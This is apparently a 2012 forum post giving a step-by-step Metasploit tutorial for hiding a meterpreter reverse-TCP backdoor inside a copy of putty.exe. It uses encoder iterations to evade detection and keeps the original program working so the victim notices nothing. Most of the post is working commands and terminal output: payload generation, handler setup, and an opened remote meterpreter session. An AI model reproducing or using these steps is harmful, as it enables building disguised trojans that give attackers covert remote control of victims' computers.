12 Metasploit bundled backdoors
Posted on 2012-8-5 20:47:42
Bind the payload to an executable so that the target is compromised without noticing anything; putty.exe is used as the example:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.105 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5

If you choose a GUI program as the bind target and do not use the -k option, no cmd window pops up when the target runs the program; the -k option makes the payload run independently of the template program's own process (the template keeps working as normal).
    root@Dis9Team:~# cd /pentest/exploits/framework
    root@Dis9Team:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.105 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    root@Dis9Team:/pentest/exploits/framework# cd /tmp/
    root@Dis9Team:/tmp# ls
    keyring-YKheJc      putty.exe              ssh-fRFnTh1373
    orbit-root          putty_pro.exe          VMwareDnD
    pulse-9HlIWyeFffiQ  serverauth.qx1KlJ7xCM  vmware-root
    root@Dis9Team:/tmp#
    msf > use exploit/multi/handler
    msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf  exploit(handler) > set lhost 192.168.1.105
    lhost => 192.168.1.105
    msf  exploit(handler) > exploit

    [*] Started reverse handler on 192.168.1.105:4444
    [*] Starting the payload handler...
    [*] Sending stage (752128 bytes) to 192.168.1.101
    [*] Meterpreter session 1 opened (192.168.1.105:4444 -> 192.168.1.101:1034) at 2012-02-28 18:10:10 +0800

    meterpreter >
Play a thousand tunes and you will know music; examine a thousand swords and you will know a blade.